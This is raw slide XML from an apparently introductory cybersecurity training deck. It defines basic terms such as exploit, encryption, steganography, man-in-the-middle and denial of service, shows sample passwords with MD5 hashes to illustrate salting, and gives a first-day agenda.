          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Action or series of actions by a third party that result in unexpected, undesirable, or unwanted results on a system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388023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2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Air Gap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Physically separated devices in which there are no interconnections in order to safeguard against hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47911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5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Writing and using codes to provide secure communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Using codes to obfuscate a private message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Determining the original message from an encoded message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244730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200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hiding information in an image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92891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3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“Man In The Middle”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A form of attack whereby the attacker stands between the target its desired destination thereby giving the attacker the ability to inspect all messages coming and going</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27498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2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Denial of Service (DoS/DDoS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A common attack that overwhelms a target with a flood of traffic making the target unable to respond to authentic requests and commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139306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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>One way, unique but repeatable cryptologic function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for shredded hash browns">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D022CC4-6F58-43AD-8596-CB6C7957E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374" y="3579922"/>
            <a:ext cx="4136990" cy="413699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9057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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Salt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Addition of a value or text to a message to be hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D691A7F-8189-47F1-81E1-71C975061337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3025292814"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2004839" y="3135884"/>
          <a:ext cx="8714464" cy="3032305"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4095672">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2153812383"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4618792">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2450654586"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="325926">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MD5 hash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2484817551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533309">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>rainbow</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>cd13b6a6af66fb774faa589a9d18f906</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2131177751"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533309">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>rainbow*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>peanut~butter!banana</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>c564ad5275c8ab74391fc4d00703fbe0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1020406121"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533309">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cowpolk</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>056e78ae6b6d8a4dcfaaa63b44609117</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272163400"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533309">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cowpolk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>peanut~butter!banana</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7affa003e61fa4f692eae630fd1fae22</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="853303810"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533309">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cowpolk42</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4e13a926bc4cef9b6eb96bbdc6e9d13c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3334351492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22415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3062968" y="2407609"/>
            <a:ext cx="6066063" cy="1938992"/>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Further Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564992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Agenda – Day 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4524315"/>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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Intro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vocabulary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Acts, Laws &amp; Statutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Case Study Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Network Concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cyber Range Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Introduction to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
